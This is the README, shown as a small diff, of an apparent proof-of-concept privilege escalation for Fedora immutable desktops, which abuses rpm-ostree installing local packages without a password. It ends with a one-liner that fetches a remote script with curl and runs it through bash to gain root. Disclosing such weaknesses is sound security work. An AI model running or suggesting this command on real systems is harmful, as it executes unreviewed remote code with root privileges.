rohanssrao/silverblue-privesc/README.md

 A privilege escalation proof-of-concept for Fedora immutable desktops, using the fact that `rpm-ostree install` doesn't ask for the user's password to install local packages.

+This is a demonstration that any program running as a member of the `wheel` group (e.g., a `pip` or `npm` package, or `curl | bash`) is able to execute arbitrary code as root without user interaction.

 ## One-liner
 ```
 bash <(curl https://raw.githubusercontent.com/rohanssrao/silverblue-privesc/main/privesc.sh)